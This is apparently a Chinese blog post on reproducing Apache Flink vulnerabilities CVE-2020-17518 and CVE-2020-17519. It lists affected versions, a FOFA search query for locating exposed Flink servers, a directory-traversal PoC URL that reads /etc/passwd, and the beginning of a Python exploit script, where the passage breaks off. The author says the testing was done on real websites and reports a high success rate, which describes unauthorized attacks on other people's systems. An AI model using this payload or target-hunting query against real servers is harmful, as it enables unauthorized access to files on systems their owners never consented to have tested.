CVE-2020-17518
CVE-2020-17519
今天嗓子有点哑没去上班在家写点复现把,这个漏洞有两个编号正确来说是有两种方式,一种是可进行目录遍历,一种是进行远程写入,都是通过REST API进行,此漏洞的影响很是广泛,此款框架核心用java和Scala编写
由于时间有限直接从实战出发未能搭建详细的测试环境一切测试均在真实环境中进行所以并无远程写入的详细过程
远程读取影响版本
1.11.0、1.11.1、1.11.2
远程写入影响版本
Flink 1.5.1-1.11.2
fofa查询语句
app="Apache-Flink"
目录遍历poc
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
试了几个网站成功率还是比较高的
漏洞利用exp
import requests
import sys
try:
requests.packages.urllib3.disable_warnings()
url = input("")
poc = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%